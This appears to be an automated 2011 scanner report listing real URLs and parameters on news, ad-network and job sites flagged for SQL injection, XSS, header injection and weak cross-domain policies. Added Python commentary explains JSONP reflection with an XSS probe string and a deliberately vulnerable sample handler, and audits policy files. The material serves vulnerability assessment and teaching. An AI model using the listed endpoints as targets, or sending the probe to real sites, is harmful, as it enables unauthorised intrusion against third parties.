XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09032011-04

Report generated by XSS.CX at Sat Sep 03 19:32:42 GMT-06:00 2011.


1. SQL injection

1.1. http://d3fd89.r.axf8.net/mr/e.gif [a parameter]

1.2. http://ib.adnxs.com/getuidnb [Referer HTTP header]

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778 [REST URL parameter 5]

2. XPath injection

2.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 2]

2.2. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 3]

3. Cross-site scripting (stored)

3.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

3.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

4. HTTP header injection

4.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

4.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

4.3. http://c7.zedo.com/utils/ecSet.js [v parameter]

4.4. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

5.2. http://ad.turn.com/server/pixel.htm [sp parameter]

5.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

5.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]

5.5. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [height parameter]

5.6. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [wcguid parameter]

5.7. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [width parameter]

5.8. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpt parameter]

5.9. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpvc parameter]

5.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [name of an arbitrarily supplied request parameter]

5.11. http://api.bit.ly/shorten [callback parameter]

5.12. http://api.bit.ly/shorten [longUrl parameter]

5.13. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

5.14. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

5.15. http://api.echoenabled.com/v1/search [q parameter]

5.16. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.17. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.18. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.19. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.20. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.21. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.22. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.23. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

5.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

5.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

5.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

5.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

5.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

5.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

5.31. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

5.32. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

5.33. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

5.34. http://control.adap.tv/control [as parameter]

5.35. http://control.adap.tv/control [categories parameter]

5.36. http://control.adap.tv/control [context parameter]

5.37. http://control.adap.tv/control [eov parameter]

5.38. http://control.adap.tv/control [height parameter]

5.39. http://control.adap.tv/control [htmlEnabled parameter]

5.40. http://control.adap.tv/control [isTop parameter]

5.41. http://control.adap.tv/control [keywords parameter]

5.42. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]

5.43. http://control.adap.tv/control [pageUrl parameter]

5.44. http://control.adap.tv/control [sessionId parameter]

5.45. http://control.adap.tv/control [width parameter]

5.46. http://digg.com/submit [REST URL parameter 1]

5.47. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

5.48. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

5.49. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

5.50. http://jlinks.industrybrains.com/jsct [ct parameter]

5.51. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

5.52. http://jlinks.industrybrains.com/jsct [tr parameter]

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]

5.54. http://js.www.reuters.com/recommend/re/re [callback parameter]

5.55. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

5.56. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

5.57. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

5.58. http://r.turn.com/server/pixel.htm [fpid parameter]

5.59. http://r.turn.com/server/pixel.htm [sp parameter]

5.60. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [lr parameter]

5.61. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [rssid parameter]

5.62. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

5.63. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

5.64. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

5.65. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

5.66. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard [mbox parameter]

5.67. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

5.68. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [name of an arbitrarily supplied request parameter]

5.69. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 1]

5.70. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 3]

5.71. http://www.idg.com/www/rd.nsf/rd [name of an arbitrarily supplied request parameter]

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

5.73. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]

5.74. http://www.reuters.com/assets/commentsChild [articleId parameter]

5.75. http://www.reuters.com/assets/commentsChild [channel parameter]

5.76. http://www.reuters.com/assets/searchIntercept [blob parameter]

5.77. http://www.reuters.com/tracker/guid [cb parameter]

5.78. https://www.sprint.net/ [name of an arbitrarily supplied request parameter]

5.79. https://www.sprint.net/external_videos/pages.php [REST URL parameter 1]

5.80. https://www.sprint.net/external_videos/pages.php [REST URL parameter 2]

5.81. https://www.sprint.net/index.php [REST URL parameter 1]

5.82. https://www.sprint.net/index.php [name of an arbitrarily supplied request parameter]

5.83. https://www.sprint.net/min/ [REST URL parameter 1]

5.84. http://www.und.com/allaccess/ [REST URL parameter 1]

5.85. http://www.und.com/favicon.ico [REST URL parameter 1]

5.86. http://www.und.com/gametracker/launch/ [REST URL parameter 1]

5.87. http://www.und.com/gametracker/launch/ [REST URL parameter 2]

5.88. http://www.und.com/nd.ico [REST URL parameter 1]

5.89. http://www.und.com/photogallery/ [REST URL parameter 1]

5.90. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

5.91. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

5.92. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

5.93. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

5.94. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

5.95. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

5.96. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

5.97. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

5.98. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 1]

5.99. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 2]

5.100. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 3]

5.101. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 4]

5.102. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 5]

5.103. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 6]

5.104. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 7]

5.105. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 1]

5.106. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 2]

5.107. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 3]

5.108. http://www.careerbuilder.com/ [Referer HTTP header]

5.109. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx [Referer HTTP header]

5.110. http://www.careerbuilder.com/JobSeeker/Jobs/JobDetails.aspx [Referer HTTP header]

5.111. http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header]

5.112. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx [Referer HTTP header]

5.113. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [Referer HTTP header]

5.114. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]

5.115. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

5.116. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

5.117. http://www.sologig.com/ [Referer HTTP header]

5.118. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

5.119. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]

5.120. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie]

5.121. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [xa cookie]
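Several of the reflected findings above sit on JSONP endpoints whose callback or cb parameter is echoed into the response body. The Python below is added here as an illustration and is not part of the XSS.CX report or of any host listed above. It models that pattern with a hypothetical endpoint that concatenates the callback into a text/html body, the hardened version that whitelists the callback name and serves it as script with nosniff, and the reflection check a scanner performs to tell an unencoded reflection from an encoded one. The function names, the marker value and the payload are assumptions.

```python
import json
import re

# A JSONP callback must be a bare JavaScript identifier path such as
# "cb", "jQuery17_123" or "window.handlers.cb". Quotes, parentheses,
# angle brackets and whitespace are rejected rather than echoed back.
CALLBACK_RE = re.compile(
    r"^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64


def serve_vulnerable(callback, payload):
    """Naive JSONP endpoint (hypothetical, for illustration).

    Whatever arrives in the callback parameter is concatenated into the
    body, and the body is labelled text/html, so a browser that navigates
    straight to the URL renders any markup the parameter contains.
    Returns (status, headers, body).
    """
    headers = {"Content-Type": "text/html"}
    body = "%s(%s);" % (callback, json.dumps(payload))
    return 200, headers, body


def serve_hardened(callback, payload):
    """The same endpoint with the controls a reviewer would ask for."""
    if len(callback) > MAX_CALLBACK_LEN or not CALLBACK_RE.match(callback):
        # Reject without echoing the offending value back to the client.
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    headers = {
        # Script MIME type: the body is not interpreted as HTML when the
        # URL is opened directly ...
        "Content-Type": "application/javascript; charset=utf-8",
        # ... and nosniff stops the browser from second-guessing that.
        "X-Content-Type-Options": "nosniff",
    }
    body = "%s(%s);" % (callback, json.dumps(payload))
    return 200, headers, body


def make_probe(marker):
    """The probe a scanner sends: a unique marker wrapped in characters
    that close an HTML attribute and open a new tag."""
    return '"><%s>' % marker


def classify_reflection(body, marker):
    """What a response says about the probe built from marker."""
    if make_probe(marker) in body:
        return "unencoded"   # metacharacters survived: likely injectable
    if marker in body:
        return "encoded"     # reflected, but the metacharacters were neutralised
    return "absent"          # not reflected at all (or the request was rejected)


if __name__ == "__main__":
    marker = "xss7f3a"       # constructed; a real scanner picks a random value
    data = {"count": 1}
    for handler in (serve_vulnerable, serve_hardened):
        status, headers, body = handler(make_probe(marker), data)
        print(handler.__name__, status, headers["Content-Type"],
              classify_reflection(body, marker))
    print(serve_hardened("jQuery17_123", data)[2])
```

The "encoded" outcome is the one to watch for when triaging a list like the one above: a parameter that comes back with its angle brackets turned into entities is reflected but is not, on that evidence alone, injectable.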

6. Flash cross-domain policy

6.1. http://a.tribalfusion.com/crossdomain.xml

6.2. http://ad.afy11.net/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://ad.turn.com/crossdomain.xml

6.5. http://admeld.adnxs.com/crossdomain.xml

6.6. http://admin.brightcove.com/crossdomain.xml

6.7. http://ads.undertone.com/crossdomain.xml

6.8. http://altfarm.mediaplex.com/crossdomain.xml

6.9. http://api.affinesystems.com/crossdomain.xml

6.10. http://api.bit.ly/crossdomain.xml

6.11. http://as.casalemedia.com/crossdomain.xml

6.12. http://audit.303br.net/crossdomain.xml

6.13. http://b.scorecardresearch.com/crossdomain.xml

6.14. http://bh.contextweb.com/crossdomain.xml

6.15. http://c.brightcove.com/crossdomain.xml

6.16. http://c5.zedo.com/crossdomain.xml

6.17. http://c7.zedo.com/crossdomain.xml

6.18. http://cdn.cinesport.com/crossdomain.xml

6.19. http://cdn.gigya.com/crossdomain.xml

6.20. http://cdn.taboolasyndication.com/crossdomain.xml

6.21. http://cdn.turn.com/crossdomain.xml

6.22. http://cdn.visiblemeasures.com/crossdomain.xml

6.23. https://cdns.gigya.com/crossdomain.xml

6.24. http://clk.fetchback.com/crossdomain.xml

6.25. http://companion.adap.tv/crossdomain.xml

6.26. http://control.adap.tv/crossdomain.xml

6.27. http://d3fd89.r.axf8.net/crossdomain.xml

6.28. http://external.ak.fbcdn.net/crossdomain.xml

6.29. http://findnsave.sacbee.com/crossdomain.xml

6.30. http://gannett.gcion.com/crossdomain.xml

6.31. http://goku.brightcove.com/crossdomain.xml

6.32. http://gscounters.gigya.com/crossdomain.xml

6.33. http://i.w55c.net/crossdomain.xml

6.34. http://ib.adnxs.com/crossdomain.xml

6.35. http://imp.fetchback.com/crossdomain.xml

6.36. http://init.lingospot.com/crossdomain.xml

6.37. http://js.revsci.net/crossdomain.xml

6.38. http://load.exelator.com/crossdomain.xml

6.39. http://load.tubemogul.com/crossdomain.xml

6.40. http://log.adap.tv/crossdomain.xml

6.41. http://metrics.sprint.com/crossdomain.xml

6.42. http://motifcdn2.doubleclick.net/crossdomain.xml

6.43. http://nmcharlotte.112.2o7.net/crossdomain.xml

6.44. http://odb.outbrain.com/crossdomain.xml

6.45. http://p.brilig.com/crossdomain.xml

6.46. http://paid.outbrain.com/crossdomain.xml

6.47. http://pbid.pro-market.net/crossdomain.xml

6.48. http://pix04.revsci.net/crossdomain.xml

6.49. http://pixel.invitemedia.com/crossdomain.xml

6.50. http://pixel.quantserve.com/crossdomain.xml

6.51. http://premium.mookie1.com/crossdomain.xml

6.52. http://qlog.adap.tv/crossdomain.xml

6.53. http://r.turn.com/crossdomain.xml

6.54. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

6.55. http://receive.inplay.tubemogul.com/crossdomain.xml

6.56. http://redir.adap.tv/crossdomain.xml

6.57. http://s0.2mdn.net/crossdomain.xml

6.58. http://s3.cinesport.com/crossdomain.xml

6.59. http://search.spotxchange.com/crossdomain.xml

6.60. http://secure-us.imrworldwide.com/crossdomain.xml

6.61. http://segments.adap.tv/crossdomain.xml

6.62. http://simg.zedo.com/crossdomain.xml

6.63. https://socialize.gigya.com/crossdomain.xml

6.64. http://sprint.tt.omtrdc.net/crossdomain.xml

6.65. http://statse.webtrendslive.com/crossdomain.xml

6.66. http://studio-5.financialcontent.com/crossdomain.xml

6.67. http://sync.adap.tv/crossdomain.xml

6.68. http://sync.mathtag.com/crossdomain.xml

6.69. http://sync.tidaltv.com/crossdomain.xml

6.70. http://tags.bluekai.com/crossdomain.xml

6.71. http://tcr.tynt.com/crossdomain.xml

6.72. http://traffic.outbrain.com/crossdomain.xml

6.73. http://trc.taboolasyndication.com/crossdomain.xml

6.74. http://usatoday1.112.2o7.net/crossdomain.xml

6.75. http://vast.ap919.btrll.com/crossdomain.xml

6.76. http://video.od.visiblemeasures.com/crossdomain.xml

6.77. http://wac.3a03.edgecastcdn.net/crossdomain.xml

6.78. http://www.goutsa.com/crossdomain.xml

6.79. http://www.wunderground.com/crossdomain.xml

6.80. http://www.zvents.com/crossdomain.xml

6.81. http://adadvisor.net/crossdomain.xml

6.82. http://charlotteobserver.adperfect.com/crossdomain.xml

6.83. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

6.84. http://content.usatoday.com/crossdomain.xml

6.85. http://delivery.sprint.com/crossdomain.xml

6.86. http://developers.facebook.com/crossdomain.xml

6.87. http://disqus.com/crossdomain.xml

6.88. http://espn.go.com/crossdomain.xml

6.89. http://friendfeed.com/crossdomain.xml

6.90. http://googleads.g.doubleclick.net/crossdomain.xml

6.91. http://grfx.cstv.com/crossdomain.xml

6.92. http://ocp.ncaa.com/crossdomain.xml

6.93. http://onlyfans.cstv.com/crossdomain.xml

6.94. http://optimized-by.rubiconproject.com/crossdomain.xml

6.95. http://pagead2.googlesyndication.com/crossdomain.xml

6.96. http://picasaweb.google.com/crossdomain.xml

6.97. http://portfolio.us.reuters.com/crossdomain.xml

6.98. http://pubads.g.doubleclick.net/crossdomain.xml

6.99. http://rd.rlcdn.com/crossdomain.xml

6.100. http://rtq.careerbuilder.com/crossdomain.xml

6.101. http://search.charlotteobserver.com/crossdomain.xml

6.102. http://search2.sacbee.com/crossdomain.xml

6.103. http://snas.nbcuni.com/crossdomain.xml

6.104. http://static.ak.fbcdn.net/crossdomain.xml

6.105. http://syndication.mmismm.com/crossdomain.xml

6.106. http://www.careerbuilder.com/crossdomain.xml

6.107. http://www.cars.com/crossdomain.xml

6.108. http://www.charlotteobserver.com/crossdomain.xml

6.109. http://www.facebook.com/crossdomain.xml

6.110. http://www.fansonly.com/crossdomain.xml

6.111. http://www.foxsportssouthwest.com/crossdomain.xml

6.112. http://www.latimes.com/crossdomain.xml

6.113. http://www.myspace.com/crossdomain.xml

6.114. http://www.reuters.com/crossdomain.xml

6.115. http://www.sacbee.com/crossdomain.xml

6.116. http://www.sologig.com/crossdomain.xml

6.117. http://www.stumbleupon.com/crossdomain.xml

6.118. http://www.tsn.ca/crossdomain.xml

6.119. http://www.usatoday.com/crossdomain.xml

6.120. http://www.wtp101.com/crossdomain.xml

6.121. http://www.youtube.com/crossdomain.xml

6.122. http://admin6.testandtarget.omniture.com/crossdomain.xml

6.123. http://api.twitter.com/crossdomain.xml

6.124. https://docs.google.com/crossdomain.xml

6.125. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

6.126. http://twitter.com/crossdomain.xml

6.127. http://www.traffic.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.3. http://content.usatoday.com/clientaccesspolicy.xml

7.4. http://metrics.sprint.com/clientaccesspolicy.xml

7.5. http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml

7.6. http://pixel.quantserve.com/clientaccesspolicy.xml

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.9. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

7.10. http://video.od.visiblemeasures.com/clientaccesspolicy.xml

7.11. http://www.goutsa.com/clientaccesspolicy.xml

7.12. http://www.tulsaworld.com/clientaccesspolicy.xml

7.13. http://www.usatoday.com/clientaccesspolicy.xml
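A crossdomain.xml or clientaccesspolicy.xml entry above records that the crawler found a policy file on that host, not that the policy is permissive. The file only matters when it grants broad access on a host that serves authenticated or per-user content, because the Flash or Silverlight plugin sends the user's cookies with the cross-domain requests the policy allows. The Python below is added here and is not part of the report; it parses constructed sample policies (which describe no host listed above) and flags the settings worth checking by hand: a wildcard domain, secure="false", a site-control that honours arbitrary policy files on the host, and a Silverlight policy that grants the whole site to any origin.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies; none of these was fetched from a host in
# the report above.
CROSSDOMAIN_OPEN = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

CROSSDOMAIN_TIGHT = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com"/>
  <allow-access-from domain="*.cdn.example.com"/>
</cross-domain-policy>"""

CLIENTACCESS_OPEN = """<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def audit_crossdomain(xml_text):
    """Flag the permissive settings in a Flash crossdomain.xml."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["not a Flash cross-domain policy"]
    findings = []
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        findings.append("site-control: policy files anywhere on the host are honoured")
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append("allow-access-from: any domain (*)")
        elif domain.startswith("*."):
            findings.append("allow-access-from: whole subdomain tree %s" % domain)
        # secure defaults to true; only an explicit "false" is a finding.
        if el.get("secure", "true").lower() == "false":
            findings.append('allow-access-from %s: secure="false" '
                            '(http:// SWFs may read https:// content)' % domain)
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*" and el.get("headers") == "*":
            findings.append("allow-http-request-headers-from: any origin, any header")
    return findings


def audit_clientaccesspolicy(xml_text):
    """Flag the permissive settings in a Silverlight clientaccesspolicy.xml."""
    root = ET.fromstring(xml_text)
    if root.tag != "access-policy":
        return ["not a Silverlight client access policy"]
    findings = []
    for policy in root.iter("policy"):
        for af in policy.iter("allow-from"):
            if af.get("http-request-headers") == "*":
                findings.append("allow-from: any request header")
            for d in af.iter("domain"):
                if d.get("uri") == "*":
                    findings.append("allow-from: any domain (*)")
        for r in policy.iter("resource"):
            if r.get("path") == "/" and r.get("include-subpaths") == "true":
                findings.append("grant-to: entire site")
    return findings


if __name__ == "__main__":
    for label, text in (("open", CROSSDOMAIN_OPEN), ("tight", CROSSDOMAIN_TIGHT)):
        print("crossdomain.xml (%s):" % label, audit_crossdomain(text) or ["ok"])
    print("clientaccesspolicy.xml:", audit_clientaccesspolicy(CLIENTACCESS_OPEN))
```

A wildcard on a pure ad or pixel host that sets no meaningful cookies is usually noise; the same wildcard on a host that also serves logged-in pages is the case to report, since a SWF on any site could then read those pages with the victim's cookies.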

8. Cleartext submission of password

8.1. http://digg.com/submit

8.2. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

8.3. http://www.ispsports.com/radio-network-affiliates.cfm

8.4. http://www.sacbee.com/reg-bin/int.cgi

8.5. http://www.sacbee.com/reg-bin/int.cgi

8.6. http://www.thatsracin.com/reg-bin/int.cgi

8.7. http://www.thatsracin.com/reg-bin/int.cgi

8.8. http://www.thatsracin.com/reg-bin/int.cgi

9. SSL cookie without secure flag set

10. Session token in URL

10.1. http://charlotteobserver.adperfect.com/

10.2. http://control.adap.tv/control

10.3. http://feedburner.google.com/fb/a/mailverify

10.4. http://log.adap.tv/log

10.5. http://qlog.adap.tv/log

10.6. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

10.7. http://www.facebook.com/extern/login_status.php

11. SSL certificate

11.1. https://google.com/

11.2. https://login.yahoo.com/

11.3. https://observ.subscribeobserver.com/

11.4. https://cdns.gigya.com/

11.5. https://commerce.us.reuters.com/

11.6. https://docs.google.com/

11.7. https://mail.google.com/

11.8. https://maps-api-ssl.google.com/

11.9. https://sites.google.com/

11.10. https://socialize.gigya.com/

11.11. https://subscriberservices.mcclatchy.com/

11.12. https://www.linkedin.com/

11.13. https://www.sprint.net/

12. Password field submitted using GET method

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

13.2. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

13.3. http://a.tribalfusion.com/j.ad

13.4. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3

13.5. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5

13.6. http://ad.turn.com/r/cs

13.7. http://ad.turn.com/server/pixel.htm

13.8. http://ad.yabuka.com/statsin/adframe/803/300x250

13.9. http://admeld.adnxs.com/usersync

13.10. http://ads.revsci.net/adserver/ako

13.11. http://ads.revsci.net/adserver/ako

13.12. http://ads.revsci.net/adserver/ako

13.13. http://ads.revsci.net/adserver/ako

13.14. http://ads.undertone.com/ajs.php

13.15. http://ak1.abmr.net/is/ads.undertone.com

13.16. http://ak1.abmr.net/is/tag.admeld.com

13.17. http://api.bizographics.com/v1/profile.redirect

13.18. http://as.casalemedia.com/s

13.19. http://b.scorecardresearch.com/b

13.20. http://b.scorecardresearch.com/p

13.21. http://b.scorecardresearch.com/r

13.22. http://bh.contextweb.com/bh/rtset

13.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

13.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

13.25. http://c7.zedo.com/utils/ecSet.js

13.26. http://clk.fetchback.com/serve/fb/click

13.27. http://cm.npc-mcclatchy.overture.com/js_1_0/

13.28. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

13.29. http://companion.adap.tv/companion/post

13.30. http://control.adap.tv/control

13.31. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

13.32. http://developers.facebook.com/plugins/

13.33. http://feedburner.google.com/fb/a/mailverify

13.34. http://i.w55c.net/ping_match.gif

13.35. http://ib.adnxs.com/getuid

13.36. http://ib.adnxs.com/getuidnb

13.37. http://imp.fetchback.com/serve/fb/adtag.js

13.38. http://imp.fetchback.com/serve/fb/imp

13.39. http://js.revsci.net/gateway/gw.js

13.40. http://leadback.advertising.com/adcedge/lb

13.41. http://load.exelator.com/load/

13.42. http://log.adap.tv/log

13.43. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

13.44. http://odb.outbrain.com/utils/get

13.45. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

13.46. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

13.47. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js

13.48. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

13.49. http://p.brilig.com/contact/bct

13.50. http://picasaweb.google.com/lh/view

13.51. http://pix04.revsci.net/A11149/a4/0/0/123.302

13.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif

13.53. http://pix04.revsci.net/D08734/a1/0/3/0.js

13.54. http://pix04.revsci.net/F09828/a4/0/0/0.js

13.55. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js

13.56. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

13.57. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js

13.58. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

13.59. http://pixel.rubiconproject.com/tap.php

13.60. http://pixel.rubiconproject.com/tap.php

13.61. http://pixel.rubiconproject.com/tap.php

13.62. http://pixel.rubiconproject.com/tap.php

13.63. http://r.openx.net/set

13.64. http://r.turn.com/server/pixel.htm

13.65. http://rt.legolas-media.com/lgrt

13.66. http://segments.adap.tv/data

13.67. http://segments.adap.tv/data/

13.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

13.69. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

13.70. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

13.71. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

13.72. http://sync.adap.tv/sync

13.73. http://sync.mathtag.com/sync/img

13.74. http://tacoda.at.atwola.com/rtx/r.js

13.75. http://tags.bluekai.com/site/2964

13.76. http://tags.bluekai.com/site/38

13.77. http://tags.bluekai.com/site/4449

13.78. http://tags.bluekai.com/site/450

13.79. http://tags.bluekai.com/site/4592

13.80. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

13.81. http://tu.connect.wunderloop.net/TU/1/1/1/

13.82. http://tu.connect.wunderloop.net/TU2/1/1/1/

13.83. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

13.84. http://www.bizographics.com/collect/

13.85. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx

13.86. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

13.87. http://www.facebook.com/campaign/landing.php

13.88. http://www.facebook.com/home.php

13.89. http://www.facebook.com/share.php

13.90. http://www.google.com/insights/search/

13.91. https://www.linkedin.com/secure/login

